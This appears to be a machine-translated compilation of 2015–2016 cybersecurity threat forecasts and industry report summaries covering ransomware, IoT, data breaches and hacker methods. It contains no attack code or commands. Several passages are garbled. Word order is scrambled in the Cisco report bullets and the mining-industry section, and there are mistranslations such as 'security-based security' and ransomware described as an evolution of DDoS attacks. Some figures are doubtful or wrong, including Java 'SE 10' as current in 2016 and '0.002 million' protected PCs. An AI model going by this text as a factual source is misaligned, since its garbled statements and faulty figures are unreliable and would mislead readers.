1. From smart to even smarter: Automated and humanoid attacks will require the development of smarter security systems

Threats are becoming more sophisticated and autonomous. Next year, malware with humanoid behavior is expected to appear, capable of adaptation and training based on successful actions. This will make attacks more effective and malicious.

2. IoT device manufacturers will be responsible for security violations

If IoT device manufacturers fail to ensure the security of their products and retain customers whose interest will decrease due to concerns about information security risks, this will lead to significant changes in the global virtual market. The interest of consumers, suppliers and other groups in developing and implementing safety standards by which device manufacturers can be held accountable for damage caused by the behavior of their products will significantly increase.

3. 20 billion IoT devices are a weak link in cloud infrastructure

The weakest link in the cloud security system is far from its architecture. The main source of threat is the millions of remote devices that gain access to cloud resources. Tools designed specifically to target end devices are expected to appear. This will lead to attacks on the client side that can easily break holes in the security systems of cloud service providers. The number of organizations implementing security-based security and segmentation strategies will increase. These systems allow you to create, configure, and enforce uniform security policies for physical, virtual, and private cloud environments-from IoT to the cloud.

4. As a result of attacks, the situation in "smart cities" will begin to heat up

Next year, attackers will target rapidly evolving building automation and control systems. If any of these integrated systems of particular interest to cybercriminals come under attack, it can lead to serious violations in the service of citizens.

5. Ransomware is just the beginning

Cybercriminals are expected to carry out targeted attacks targeting celebrities, politicians and large organizations. Automated ransomware attacks will allow attackers to take advantage of economies of scale and enrich themselves by simultaneously deceiving multiple victims, each providing a small amount. Most often, IoT devices will be attacked.

6. It will be necessary to compensate for the critical shortage of qualified personnel in the field of security by introducing new technologies

Due to the current shortage of information security specialists, many organizations and countries wishing to enter the global virtual market will be in significant danger. The personnel of these organizations do not have the experience and training necessary to solve tasks such as developing a security policy, protecting important resources that move freely between network environments, or identifying modern advanced attacks and responding.

Predicted threat trends and conclusions

The Internet of Things (IoT) and cloud technology still often appear in forecasts, but over time some trends have emerged. The degree of Internet activity of both organizations and individuals has increased significantly, which contributes to an increase in the number of potential attack areas. In addition, anything can act as an end, and in the same way, any means can become a weapon. Threats are becoming more sophisticated, they can function autonomously, and they are increasingly difficult to identify. And the latest trend: old threats are returning, improved with new technologies, which opens up new horizons in the field of detection and analysis of threats.

3.2 million PCs are vulnerable, 0.002 million have protective equipment

In October 2016, the engineering department of Talos (the division Cisco that researches and analyzes threats to) information security recalled the traditions of cybercriminals adapted for the digital era.

Cybercrime has become a large-scale problem of humanity, it affects users, companies, states. The actions of hackers can lead to material damage and paralyze the work of corporations, banks, government services and systems.

{{quote 'author=
Martin Lee, Head of Engineering at Talos' Martin Lee, Head of Engineering at Talos' Models, the attackers are not new. They use traditional schemes, adapting them to the realities of the digital age.

The classic model of criminal activity - kidnapping for ransom, has become widespread among cyber fraudsters. If gangsters used to be limited by the territory on which they worked, then cybercriminals know no boundaries. The first case of abduction demanding ransom in the digital space was recorded in 1989 in Thailand. The fraudster sent emails to medical institutions demanding that the money for the stolen data be transferred to an address in Panama. A similar type of extortion lasted 16 years.

In 2005, GP coders appeared. Through these devices, criminals encrypt files on an infected device and demand money from the user for decryption. Creating encryption software ‒ a very complex process, so attackers often use fakes. Having given the money, the user may not receive the stolen documents back, since they have already been deleted, with a high probability. Criminals still use this type of extortion, only improve encryption methods.

The next stage in the evolution of DDoS attacks began in March 2016, when we encountered the activities of the SamSam gang. This group penetrates the server system of the organization, gets to the key data necessary for daily operations, encrypts them and demands a ransom. The hacked company has a great temptation to pay criminals, as these files are important for everyday work.}}

Cybercrime has become a business. Attackers conduct their activities as commercial companies. They seek to reduce costs and maximize profits, enter other markets. Criminals carefully calculate their benefits. The amount of the ransom should be slightly lower than the value of the stolen documents from the company, it should cover the costs of conducting criminal activities. In their work, attackers use the same high-tech tools as commercial companies. Large players on this black market are served by service organizations, an ecosystem of individual specialists and criminal groups that carry out DDoS attacks has been created.

It must be remembered that if you have something of value, then there will definitely be a fraudster who will try to steal it. According to our data, 3.2 million computers and systems in the world are vulnerable to hacker attacks, and only 2,100 of them have the necessary protection tools installed. Martin Lee

Europol named eight major cybercrime trends

• Crime-as-a-service: "Underground digital services" are underpinned by a crime-as-a-service model that is increasingly popular and in demand. It combines specialized suppliers of hacker utilities and organized criminal groups. Terrorists have obvious potential to gain access to this sector in the near future.
• Ransomware: Extortion and banking Trojans remain the top threats among malware. software And this trend is unlikely to change in the foreseeable future.
• Criminal data use: Data remains a key commodity for cybercriminals. In many cases, they are used for immediate financial gain, but are increasingly used to implement more complex fraud schemes, encrypted for ransom, or used directly for extortion.
• Payment fraud: EMV (chip and PIN), geo-blocking and other industrial security measures continue to help in the effective fight against card fraud, but, nevertheless, the number of attacks directed against ATMs is also growing. Organized crime groups are starting to compromise payments related to the use of contactless cards (NFC).
• Online child sexual abuse: The use of end-to-end encryption platforms to share media files, as well as the use of anonymous payment systems, contributes to the escalation of online broadcasting of child abuse.
• Abuse of the "dark side of the web": The "dark part of the world's Internet web" continues to promote criminals involved in a number of illegal activities, such as sharing files with a record of child sexual abuse. The extent to which extremist groups use cyber technology to carry out attacks is currently limited, but the supply of hacker utilities and services, as well as illegal goods, on the "dark web" can quickly change the situation.
• Social engineering: law enforcement agencies have registered an increase in the number of phishing attacks aimed at targets of high importance. The main threat was attacks against the CEOs of enterprises and organizations.
• Virtual currencies: Bitcoin remains the currency that fraudsters prefer to pay for the purchase of illegal goods and services on the dark web. Bitcoin has also become the standard payment solution for requesting ransom and other forms of extortion.

There is still an increase in the volume, scale and cost of cybercrimes. Recently, these indicators have reached an unprecedented level. Some EU member states say that cases of cybersecurity crimes may already exceed the number of traditional^[44] crimes^[45]

The increase in the number of fraudsters, together with the increase in the number of opportunities to participate in highly profitable illegal activities, partially fuels this trend, as well as the emergence of new tools for committing cybercrime in areas such as mobile malware and fraud directed against ATMs. Nevertheless, the main part of the problem is insufficient compliance with digital security standards by legal entities and individuals.

A significant part of cybercrime activity still uses relatively old technologies, security for which is available, but not widespread.

9x increase in unknown malware in a decade

On September 22, 2016, Check Point Software Technologies Ltd. published the results of a study in which it noted a 9-fold increase in unknown malware attacking enterprise systems and concluded that companies should implement a best-in-class security architecture.

The company's experts analyzed the information received from 31,000 Check Point security gateways around the world and described what known and unknown types of malware and attacks affect companies' IT systems, what are the consequences of integrating mobile devices into enterprise IT infrastructures. An assessment of the losses of companies from hacks and the costs of eliminating their consequences is also given.

The SANS 2016 Threat Landscape Study, conducted with SANS researchers, surveyed more than 300 IT and security professionals worldwide.

The purpose of the survey is to find out:

• what threats organizations face in reality,
• when and how these threats become security incidents,
• what types of threats have the most serious consequences,
• what critical tasks are faced by companies that want to protect themselves.

Both the Check Point Security Report and SANS 2016 Threat Landscape Study provide insights into the landscape of cyber threats - from the network to the end device.

The main conclusions of the study:

• The number of types of unknown malware ON continues to grow. The researchers found a 9x increase in the number of unknown programs attacking organizations. The reason for the increase in the number of cases of penetration into the network is employees downloading unknown malware every 4 seconds. Every month, experts discover almost 12 million unknown variants of malware. Over the past two years, there have been more such "finds" than in the entire previous decade.
• Security can't keep up with fast-paced mobile devices. Smartphones and tablets account for 60% of all time spent on digital media. For business, mobile devices are terrifying in terms of access security and luck in terms of productivity. Despite the fact that employees do not want to deliberately harm the security of the company, through the fault of every fifth of them, hacking occurs - through mobile malware or an infected Wi-Fi point .
• End devices are the starting point of most attacks. In the companies studied, user devices are the most common cause of hacking and the most important component of cyber defense, and in 75% of cases hackers use email to carry out attacks. 39% of attacks on end devices bypass firewall protection, and regular scans detect 85% of threats after they hit the company's network.

Both reports warn that effective security begins with the introduction of a best-in-class security architecture that will help address current and future IT protection challenges. Advanced threat prevention, mobile security, and network segmentation are critical components needed by information security today's company.

Cybercriminals set their sights on extractive industry

On August 11, 2016 Trend Micro Incorporated , she published mining the Cyber ​ ​ Threats to the Mining Industry report, which concluded that cybercriminals have a growing level of interest in. extractive industry

Previously, the main goals of cybercriminals were banks, financial, medical institutions, now they have paid attention to extractive industry enterprises. The problem of cyber attacks in this industry is closely related to the growing degree of automation of its processes. Manual labor and simple mechanisms were replaced by devices controlled centrally through special software.

Such enterprises use Operational Technology (OT) - hardware and software that records changes in the production process and controls them. At the same time, in many OT organizations, at best, they are poorly protected from possible cyber attacks. And an increasing penetration of the industry, cloud computing business intelligence systems Internet of Things and leads to the fusion of IT and OT, which gives attackers wide access to system components and critical processes.

Most industrial control systems (Industrial Control Systems, ICS) used in 2016 were developed decades ago. Due to the new requirements of connecting to the corporate network and using remote access, ICS developers usually adapt the appropriate IT solutions to simplify integration and reduce development costs. However, this leads to a number of new vulnerabilities.

Examples of large cyber attacks in the extractive industry:

In April and May 2015, the Canadian gold mining company Detour Gold Corp. was attacked by a hacker group that called itself Angels_Of_Truth. As a result, attackers stole more than 100 GB of valuable information. At the same time, 18 GB of this data was placed on the torrent tracker.

In February 2016, the Department of Industry, Resources power engineering specialists and NSW was also attacked by hackers. The attackers unsuccessfully tried to gain access to confidential information regarding the permission to mine useful ones. minerals

In April 2016, Canadian gold miner Goldcorp suffered a major data breach. The attackers released 14.8 GB of data by posting the corresponding document on Pastebin, a popular site for storing and sharing data, with a link to download it. The archive contained personal data of employees and financial information.

Cyber ​ ​ attacks in industry are carried out mainly to gain certain technical knowledge in achieving a competitive advantage, weakening the economy of another state, obtaining certain data (personal information (PII), financial component or accounts) or even to protest against companies in the mining industry as a source of environmental pollution.

Cyber ​ ​ attacks can really have a great impact on the company's business, for example, lead to a deterioration in financial performance, theft of intellectual property, loss of competitive advantage, etc. All this becomes possible due to the ability of cybercriminals to access the necessary information. In the extractive industry, attackers are interested, first of all:

• data on the pricing of metals and minerals;
• intellectual property, such as the method of production, processing of raw materials, chemical formulas, software, etc.;
• information on public policy, decisions and decision-making processes of corporate executives;
• data on new potential fields;
• information on ore reserves and production process;
• data from mine monitoring systems that are used for real-time production control, safety and environmental monitoring.

Cyber attacks in the extractive industry can not only cause losses due to production downtime, but have a negative impact on the value of the company's shares, damage the economy of a country or region, if it depends on such an enterprise.

The most commonly used methods of committing cyber attacks today are:

• phishing and social engineering;
• exploitation of vulnerabilities;
• infection of the site that employees of the enterprise visit most often;
• incorrect configuration of the operation system;
• hidden loading;
• malicious advertising;
• compromise of third-party vendors;
• man-in-the-middle ( MitM) attack;
• contamination of equipment;
• insiders.

In its report, the company concludes that most extractive industry businesses do not recognize the importance of protecting against cyber attacks. And vulnerabilities that attackers can exploit are constantly discovered.

Special attention should be paid to cybersecurity specialists by large mining companies whose activities are directly related to the state of the economy of individual regions or countries. First of all, they need to implement advanced protection methods at all levels of enterprise management.

Cisco: Ransomware Is Coming

On July 28, 2016, Cisco published an information security report for the first half of 2016, in which it pointed out the high likelihood of the next generation of ransomware. In light of this statement, the main solution to the problem for organizations in the field of data protection, the company sees the need to close the "window of opportunity" to attackers.

According to Cisco's Midyear Cybersecurity Report, organizations are not ready for the emergence of varieties of sophisticated ransomware and among the main reasons for the hidden activity of cybercriminals:

• unstable infrastructure,
• poor network hygiene,
• low detection rate.

Cisco 2016 Midyear Cybersecurity Report: Executive Perspectives, (2016)

The results of the study allow us to conclude: the main difficulties of the company are experienced when trying to limit the operational space of attackers, which jeopardizes the entire basic structure necessary for digital transformation. Attackers have expanded their areas of activity by attacking servers, the sophistication of attacks has increased, and cases of using encryption to disguise malicious activities have become more frequent.

According to the results of the first half of 2016, ransomware became the most profitable type of malicious software in history, Cisco experts said. They believe this trend will continue, ransomware will have even more destructive functionality, gaining the ability to distribute on its own. In this case, networks and companies can become "hostages."

Modular varieties of such programs will quickly change tactics to achieve maximum efficiency. For example, future ransomware will be able to avoid detection due to the ability to minimize CPU usage and the lack of control commands. Such versions of ransomware will spread faster than their predecessors and self-replicate in organizations before the attack begins.

One of the main problems of companies and networks has been and remains - poor browsing of the network and endpoints. On average, it takes up to 200 days to identify new threats from organizations. Reducing the time it takes to detect threats is extremely important in terms of limiting the operational space of attackers and minimizing damage from intrusions.

Additional amenities for attackers are created by unsupported and non-updatable systems that allow them to access, go unnoticed, increase their income and inflict maximum damage. The Cisco MCR 2016 report indicates that the problem is related to the global. For several months, the growth of attacks has been noted in the most important industries (for example, in healthcare), with all vertical markets and world regions becoming the target of attackers. Public organizations and enterprises, charitable and non-governmental organizations, e-commerce companies - all of them in the first half of 2016 recorded an increase in the number of attacks.

Attackers do not limit themselves

The size of the attackers' profits is directly proportional to the period of time of covert actions. According to Cisco, in the first half of 2016, the income of attackers increased due to a number of factors:

• Expanding the scope of action. Attackers broaden their scope, moving from client exploits to server exploits, avoiding detection, maximizing damage to enterprises and their revenues.
  • Adobe Flash vulnerabilities remain one of the main targets of malicious advertising and exploit sets. In the common Nuclear suite, Flash accounts for 80% of successful hacking attempts.
  • Cisco also noted the trend of ransomware exploiting server vulnerabilities, especially for servers Jboss (10% of all servers connected To the Internet to them are compromised). Many of the vulnerabilities Jboss used to compromise systems were identified five years ago and basic adjustments, vendor updates could prevent such attacks.

• New attack methods. In the first half of 2016, cybercrime developed methods that exploited a lack of network browsing.
  • Windows binary exploits have come out on top of web attacks over the past six months. This method provides a strong position in network infrastructures and makes it difficult to detect and eliminate attacks.
  • fraudulent social engineering Facebook in moved from first place (2015) to second.

• Trail-marking. In addition to the problems of browsing, attackers began to use encryption more often as a method of masking various aspects of their activities.
  • Cisco recorded an increase in use, cryptocurrencies Transport Layer Security and, browserTor - The Onion Router which allows anonymous communication in. Internet
  • Malicious advertising campaigns recorded a 300% increase in use with protocol malware encryption between December 2015 and March 2016. HTTPS Such software allows attackers to hide their web activity for a long time, increasing the duration of illegal actions.

Security actions in attempts to reduce vulnerabilities and close gaps

Faced with sophisticated attacks, companies with limited resources and aging infrastructure have a hard time keeping up with their adversaries. The data suggests that the more important the technology is for business operations, the worse things are with the adequacy of network hygiene, including software adjustments. For example:

• for browsers, 75-80% of users use the latest or penultimate version of Google Chrome, which supports automatic updates;
• Java is updated much more slowly: one third of the systems studied have Java SE 6 software installed, which Oracle has long decommissioned (the version in effect on July 28, 2016 is SE 10);
• Up to 10% of Microsoft Office 2013 v.15x users have installed the latest patch.

The study Cisco also revealed that most of the infrastructure of potential victims is not supported or exploited if there are known vulnerabilities. This is a system problem for both vendors and endpoints. Cisco, examining > 103,000 devices connected to, To the Internet found:

• each device had an average of 28 known vulnerabilities;
• the average activity period of known vulnerabilities on devices ~ 5.64 years;
• more than 9% of known vulnerabilities are over 10 years old.

For comparison, Cisco specialists examined more than 3 million software infrastructures, mainly on the Apache platform and OpenSSH. They found an average of 16 known vulnerabilities with an average lifetime of 5.05 years.

Updating the browser on the user's device is simple, more difficult - enterprise applications and server infrastructures, since this can lead to interruptions in business processes. The conclusion made in the study: the more important the role of the application in the business operations of the company, the less likely it is to be updated regularly, often, which entails the emergence of security holes and opportunities for subsequent attacks.

Prices for hacking social media accounts and mail services

Server hacking, theft of funds from bank cards, leakage of personal data - price has appeared on these and many other "services." Dell SecureWorks, which specializes in assessing and analyzing the information security of computer systems, published a price list for hacker services around the world in the summer of 2016. According to market participants, this is one of the signals of the prosperity of cybercrime.

According to experts, access to an American account on social networks costs about $129, and to Russian Odnoklassniki and VKontakte - $194. Hacking your Gmail, Hotmail or Yahoo account will cost an average of $129. And for just 40-60 thousand rubles, you can "order" any information about a domestic competitor: information about bank accounts, TINs, constituent documents, information about employees and phone numbers.

News about the theft of personal data or illegal withdrawal of funds from a bank card appears in the press with enviable regularity. For example, in May, the personal data of 117 million users of the social network LinkedIn were put up for sale on the "shadow Internet." According to analysts, a hacker under a pseudonym "Mir" could earn about $2.5 thousand from this. And the other day, a woman from the Nizhny Novgorod region transferred 85 thousand rubles to the attacker, thinking that she was talking to a bank employee.

Balabit: TOP-10 the most popular hacker methods

1. Social engineering (e.g. phishing)

Most hackers seek to become insiders and elevate the privileges of the stolen account. Trying to find an existing privileged account and crack its password is not the fastest process, and it leaves many traces (for example, additional logs generated as a result of attempts at automated attacks) that significantly increase the risk of detecting suspicious activity. That is why hackers prefer to use social engineering techniques, encouraging users to voluntarily share their login and password.

"The latest data theft of more than 10,000 employees of the Departments of Justice and National Security and the hacking of more than 20,000 accounts of employees of the Federal Bureau of Investigation (FBI) once again prove that today it is much easier for hackers to become" their "in the system using social engineering tactics than to write zero-day exploits," says Zoltan Djörku, CEO of Balabit. Traditional access control tools and antivirus solutions are certainly necessary, but they only protect critical assets of companies when hackers are off the grid. As soon as they penetrate the system once, even through low-level access, they can easily increase powers and gain already privileged administrative access to the corporate network. The greater risk is finding a hacker inside the network when he becomes one of the privileged users.

Hacked accounts (when legitimate logins and passwords are used for criminal purposes) can be detected by noticing changes in user behavior, for example, in the time and place of login, printing speed on the keyboard, commands used, suspicion of using an account in scripts. User behavior analysis tools that create basic profiles of the actions of real employees can easily detect anomalies in the use of accounts and warn security specialists about this or block the user until all the circumstances are clarified, "adds Zoltan Djörku.

2. Compromised accounts (e.g. weak passwords)

Hacking accounts, especially those that are weak, is dangerous because users usually prefer to use simple, easy-to-remember passwords and are often the same for corporate and personal accounts. If a hacker gains access to a user's login and password in a less secure system (for example, from a personal account on a social network), he will be able to use them to log into the company's network.

3. Web attacks (for example, SQL injections)

Exploiting security holes in online applications (such as SQL injection) is still a very popular hacking method, mainly because applications are a critical interface for accessing company assets for large numbers of internal and external users, making them an attractive target for attacks. Unfortunately, the quality of the application code still raises security questions. There are many automatic scanners that attackers can use to detect vulnerable applications. Other hacking methods can lead hackers to the same results, but turn out to be more difficult to use or longer. For example, writing an exploit takes longer and requires good programming skills.

Places among the other most popular hacker methods were distributed as follows: 4. Attacks on the client part (i.e. document viewers, browsers)
5. Using exploits for popular server updates (for example, OpenSSL, Heartbleed)
6. Unmanaged personal devices (for example, if there are no BYOD policies in the enterprise environment)
7. Physical intrusion
8. Shadow IT (for example, the use of personal cloud services by the user for business purposes)
9. Use of third party service providers (e.g. infrastructure outsourcing)
10. Stealing data uploaded to the cloud (e.g. IaaS, PaaS) "'

2015

Gemalto: Breach Level Index 2015 Data Loss Criticality Index

Gemalto published in February 2016 the results of an analysis of its Breach Level ^[46], according to which in 2015 there were 1,673 incidents in the world, which led to the compromise of 707 million data records.

Since 2013 - when the company began compiling a comparative database of publicly reported leaks - a total of more than 3.6 billion data records have been compromised worldwide, according to the Data Breach Criticality Index. According to the source of leaks in 2015, the largest number of incidents occurred in attacks by third-party attackers - a total of 964 such incidents were recorded, or 58% of the total number of incidents and 38% of the number of compromised data records. By type of compromised data, the most common leaks were still leaks aimed at stealing accounts - 53% of the total number of incidents and 40% of the number of all compromised data records.

By industry, leaks in the public sector accounted for 43% of all compromised data records, up 476% from 2014 (due to several extremely large data leaks in the US and Turkey), and only 16% of the total number of leaks. The health sector accounted for 19% of the total number of compromised records and 23% of all data breaches. The number of compromised data records in the retail sector decreased sharply compared to the same period of the previous year (by 93%): in 2015, they accounted for only 6% of all stolen data records and 10% of all recorded leaks. In the financial services sector, the number of compromised accounts decreased by almost 99%, accounting for only 0.1% of all compromised data records, or 15% of the total number of leaks.

Although the most data leaks were related to the activities of third-party attackers (58%), accidental leaks account for as much as 36% of all compromised data records. The number of attacks ordered by the governments of various countries amounted to only 2% of all data leaks, but the number of stolen data records as a result of such attacks amounted to 15% of the total number of compromised records. Attacks committed by attackers from inside the network accounted for 14% of all data leaks and only 7% of compromised data records.

In terms of geography, 77% of all data breaches occurred in North America, with 59% of all compromised records occurring in the US. The number of leaks committed in Europe accounted for 12% of the total number of incidents, and the Asia-Pacific region accounted for only 8% of the total number of leaks.

Full analysis of data breaches, including by industry, source, type and geography, is available in the 2015 Breach Level Index Report.

Gemalto: only encryption will help protect against data loss

Data breaches increased by 10% compared to the first half of 2014, with the number of compromised data records falling by 41% in the first six months of this year. The decline in the number of compromised data is explained by the fact that this year the number of recorded large-scale leaks in the retail industry was less than in the same period last year.

Despite the decrease in the total number of compromised records, large amounts of personal information and credentials are still stolen as a result of large leaks. The largest data breach in the first half of 2015 was an attack to steal the identity of Anthem Insurance customers. As a result of this attack, which received 10 points in terms of hazard on the Data Breach Criticality Index, 78.8 million accounts were compromised, which amounted to almost one third (32%) of the total number of data records stolen in the first half of 2015. Other major incidents that occurred during the reporting period included the leaking of 21 million accounts from the U.S. Office of Personnel Management (U.S. Office of Personnel Management) Human resources with a BLI hazard level of 9.7; leak of 50 million accounts in the General Directorate of Population and Citizenship Affairs of Turkey (Turkey's General Directorate of Population and Citizenship Affairs) with a degree of danger BLI: 9.3; and the leak of 20 million accounts in the Russian service Topface with a degree of danger. BLI:9.2 In fact, the top 10 data breaches account for 81.4% of all compromised data records.

Source Data Leaks

Leaks organized by government agencies account for only 2% of all incidents, but the number of compromised data as a result of such attacks is a total of 41% of the total number of stolen data, due to the scale of incidents with Anthem Insurance and Human Resources Management in the United States. While none of the top ten incidents in the first half of 2014 were government attacks, this year three of the top ten leaks, including the top two, were government-funded.

At the same time, the most common source of leaks in the first half of 2015 was the actions of malicious outsiders - such incidents accounted for 546 leaks or 62% of all leaks, compared to 465 leaks (58%) in the first half of last year. As a result of the actions of external attackers, 56% or 116 million data records were compromised, while in 2014 the results were higher - 71.8% or 298 million data records.

Data breaches by type

Identity theft remains the main type of data breach, accounting for 75% of all compromised records, and slightly more than half (53%) of all data breaches recorded in 2015. Five of the ten largest leaks, including the three largest, which received catastrophic status according to the Gemalto Index, were theft of just such data. For comparison, in the same period last year, the theft of personal and identification data accounted for seven of the ten largest incidents.

Industry-specific data breaches

As for industry statistics, leaks in government agencies and the healthcare industry accounted for approximately two-thirds of all compromised records (31% and 34%, respectively), despite the fact that the healthcare industry accounted for only 21% of the total number of leaks this year, up from 29% a year earlier. The retail sector saw a significant decline in stolen records, accounting for just 4% of total compromised data (down from 38% last year). By region, the largest number of leaks - more than three quarters (76%) occurred in the United States, where about half (49%) of all data was compromised. Turkey accounted for 26% of all compromised data, which is mainly due to a large-scale leak to GDPCA, where 50 million records were compromised due to malicious actions by third parties.

The level of encryption used to protect the opened data (and to radically reduce the possible damage from data leaks) increased slightly - up to 4% of all incidents (in the first half of 2014 this figure was 1%).

According to Forrester, attackers are using increasingly advanced and complex attack mechanisms, as a result of which the effectiveness of traditional security perimeter measures has noticeably decreased. The ever-changing and evolving nature of threats requires new security measures, one of which is the widespread use of data encryption technologies. In the future, organizations will automatically encrypt data - both those that move across the network and those that are simply stored on media. The data-centric approach to security is much more effective in countering hackers. By encrypting sensitive data, organizations make it useless for attackers, as a result of which attacks on corporate networks will become unprofitable, and hackers will switch to less secure objects. Encryption becomes a strategic foundation for security and risk management managers who are responsible for data protection and information privacy in their organizations.

Trend Micro Security Predictions

Key forecasts for 2015 from 'Trend Micro Security Predictions for 2015and Beyond: The Invisible Becomes Visible'

• More and more cybercriminals will turn to underground networks and closed forums to exchange and sell criminal profile software;
• Increasing the activity of attackers will lead to the emergence of more sophisticated hacking tools;
• Mobile vulnerabilities will play an increasing role in infecting devices; exploit sets aimed at Android will become widespread
• Targeted attacks will become the most common type of cybercrime
• New mobile payment methods will lead to new threats
• We will see new attempts to exploit vulnerabilities in open source applications
• A variety of technologies still protect devices Internet (Internet of Everything) from massive attacks, but this cannot be said about the data they process
• There will be new, even more dangerous threats to online banking and other financial services

Targeted Attack Predictions

According to the report, after cybercriminals managed to achieve notable results in the United States, the number of new targeted attacks will grow in 2015. Experts expect hackers in Vietnam, the UK and India to continue to use targeted attacks, and we will also see attacks in countries where they have not been noted before, as happened in Malaysia and Indonesia.

Financial Services Threat Forecasts

A significant increase in the level of threats awaits the banking sector, an increase in the number of unique cyber attacks targeting banks and other financial institutions is predicted. In this regard, financial institutions will have to implement two-factor identification for their online services.

Threat Forecasts for the "Internet of Everything"

The Trend Micro Security Predictions for 2015 report also predicts an increase in the use of vulnerabilities in smart devices such as cameras, various household systems and TVs, as cybercriminals increasingly aggressively attack these platforms and organizations that manage their data.

Factors such as market pressure are encouraging device manufacturers to produce more and more smart systems, but in pursuit of demand, they do not always have time to foresee security issues. Therefore, cybercriminals will increasingly find vulnerabilities and exploit them for their own purposes.

HP Cyber Risk Report

On February 24, 2015, HP published the Cyber ​ ​ Risk Report, a 2015 cybersecurity report containing the results of an analysis of the most pressing problems that the business faced in 2014. ^[47]

Employees of HP Security Research have studied common vulnerabilities that endanger the security of organizations. According to the results of the study, the main causes of problems in the field of cybersecurity in 2014 were "old," well-known vulnerabilities and incorrect configurations.

"Cyber

​ ​ defense technologies are constantly improving, but we should not" lose sight "of old vulnerabilities," says Art Gilliland, senior vice president and head of Enterprise Security Products, HP. - We found that the most serious security risks are related to vulnerabilities that we have known about for a long time. And we can't move forward forgetting these problems.'

Main results of the study

• 44% of known security incidents are related to vulnerabilities that are 2-4 years old. Attackers continue to use "old" methods to hack systems and penetrate networks. The biggest attacks of 2014 were carried out using vulnerabilities in code written several years or even decades ago.
• Incorrect server configurations are the number one problem. According to the results of the study, the main problem associated with incorrect configuration is the granting of too wide access rights to files and folders. The information that attackers receive is then used to carry out other attacks.
• In 2014, cybercriminals actively used new channels to carry out attacks, such as physical devices connected to the network via the Internet of Things. In addition, there was an increase in the number of malware for mobile devices. The expansion of the computing ecosystem plays into the hands of attackers, as it creates even more "entry points" for them to systems.
• The main causes of software vulnerabilities are problems and errors, including logical ones. Most vulnerabilities occur due to a small number of common errors in the code. Cybercriminals quickly "master" old and new vulnerabilities in software.

What needs to be done to keep yourself safe?

• Implement a comprehensive patch strategy. Keeping systems up to date significantly reduces the likelihood of a successful attack.
• Regular penetration testing and configuration verification (either on your own or with the help of external organizations) will identify configuration errors before hackers use them.
• Before introducing new technologies, it is useful to analyze how they will affect the overall level of security.
• Effective threat data sharing will help you understand malicious tactics and take action to prevent problems, improve security software to strengthen security in general.

CyberEdge Group Cyberthreat Defense Report: More than half of companies fear successful cyber attacks against them in 2015

On August 10, 2015, the results of the CyberEdge Group's annual Cyberthreat Defense Report were published, which contains information on the determination of cyber threats by IT security professionals and how to combat them.

More than 800 heads of IT security departments and practitioners, representatives of 19 different business sectors, took part in the preparation of the report.

Threat Response Report, 2015

Multiple digits of statistics:

• more than half (52%) of respondents assume that their companies will be victims of successful cyber attacks in 2015. In 2014, they accounted for 39% of the survey participants.

• respondents cite attacks on web applications as key cyber threats. Web applications are widespread in modern companies and are often the focus of cybercriminals. There are a lot of reasons for this, not the last of which is the ability to directly access confidential data.

• experts are concerned about the security of mobile devices. When assessing the ability of companies to protect themselves from cyber threats in various areas of IT interests, respondents gave the lowest ratings to mobile devices.

Alarm level by type, cyber attacks 2015

Then there are laptops and social media apps in the ranking. More than 2/3 of the organizations that participated in the survey want to replace or upgrade their existing endpoint security tools. Respondents noted that the application of the approach of using their own devices for work purposes (BYOD) will increase by almost two times - from 30% to 59% during this year. This indicates the need for additional investment in mobile security.

According to the survey participants, SDN technology can have a positive impact on protection against cyber attacks - 63% of respondents share this point of view. When asked how SDN affects the company's ability to combat cyber threats, the number of respondents who consider this technology a useful solution significantly exceeds the number of survey participants who do not share such confidence of colleagues (the ratio is at 10 to 1).

IT Security 2015

62% of respondents indicated that in 2015 the budget for IT protection should be increased. Experts advise paying special attention to the following aspects when distributing funds:

• Next-generation security for end and mobile devices
• rapidly evolving intelligence services on cyber threats;
• software-defined security solutions.

Positive Technologies: Top Cyber Attack Trends of 2015

On October 15, 2015, representatives of Positive Technologies (Positive Technologies) spoke at the conference "Trends in the development of high-tech crimes - 2015."

Discussing high-tech crimes and cyber threats, the head of the monitoring department of Positive Technologies (Positive Technologies) Vladimir Kropotov and leading analyst Yevgeny Gnedin made a report "Statistics and trends of cyber attacks for the year: we look from the outside, from the inside and from the side." Experts noted the main trends in cybercrime this year:

• attacks took on a massive nature, in which attackers bypass - for example, hack partners of the attacked organization
• the number of cases when social engineering is used in conjunction with technological methods has increased. Cybercriminals gain access to a partner's mail (or find out their email address and create a similar domain specifically for an attack) and engage in correspondence with a victim who does not know about the substitution
• an increase in attacks aimed at hacking a particular person, group of persons or specific companies. But if earlier criminals, as a rule, acted through hacking workstations, then in 2015 30% analyzed attacks were committed on corporate resources (mail servers, database servers, internal web services). Investigating targeted attacks, experts noted advanced technologies such as Watering Hole, which complicate the detection of attacks by specialized organizations and allow masking targeted attacks as massive.

Various kinds of equipment connected to the Internet ("Internet of Things") is also attacked. Criminals use the fact that users rarely install updates on such devices, as a result of which they become vulnerable to threats from the Internet. There are a lot of such devices on the network: routers, smart TVs, thermal sensors and cars. Attackers can quickly access a hundred devices using a computer, use them for DDoS attacks or creating botnets, while remaining unnoticed. The peculiarity of these devices is that if they are rebooted or turned off the power, then all traces of attacks will be erased.

Positive Technologies reported the results of security incident audits, application source codes, and information security monitoring. The study was conducted by 16 systems of large companies and government organizations (Russian and foreign), in respect of which external penetration testing was carried out in 2014-2015.

Company statistics indicate the possibility in 44% of cases to gain full outside control over all systems of the corporate structure, and administrator privileges in critical systems (databases, e-mail, management workstations) - in 33% of cases. At the same time, in 58% of systems, in order for attackers to gain full control over critical resources, there was a fairly low qualification, in 26% - the difficulty of accessing them was average and only 16% - they could not get inside the corporate network. In most cases (56%), cybercriminals used existing vulnerabilities in web applications, in 26% acted by choosing a dictionary password.

"Our study showed that only 20% of the analyzed attacks exploited zero-day vulnerabilities, that is, previously unknown ones. This suggests that in 80% of cases the victims had the opportunity to effectively defend themselves, but they did not take advantage of it, "said Vladimir Kropotov

.

Telecoms

Positive Technologies experts note a tendency to complicate telecommunications networks. Due to the development of Skype, WhatsApp, Google services, the revenues of mobile operators have decreased. An urgent problem for them was the search for new opportunities for profit: companies offer not only cellular communications, but also home Internet, IP television and their own applications. All this leads to a complication of the network: previously, telephony, the Internet and cable television had their own separate networks - now they are integrated into one common network. Due to tight integration, there are risks of violation of information security.

